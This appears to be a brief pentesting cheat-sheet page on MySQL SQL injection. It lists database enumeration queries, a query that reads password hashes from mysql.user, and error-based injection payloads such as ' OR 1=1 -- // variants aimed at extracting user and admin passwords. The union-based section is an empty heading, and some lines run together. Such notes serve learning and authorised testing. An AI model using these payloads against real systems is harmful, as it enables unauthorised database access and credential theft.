MYSQL
Authenticated SQLi (Refer here)
SELECT version();
SELECT system_user();
show databases;
SHOW TABLES FROM database_name;
OR
use <db_name>
show tables;
describe users; # describes columns in users' table
SELECT * from <test>.<users>; # here test is DB and the user is a table in test db
SELECT user, authentication_string FROM mysql.user WHERE user = 'test';bashError based SQLi
tom' OR 1=1 -- //
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- // # password for admin userUnion-based SQLi
Last updated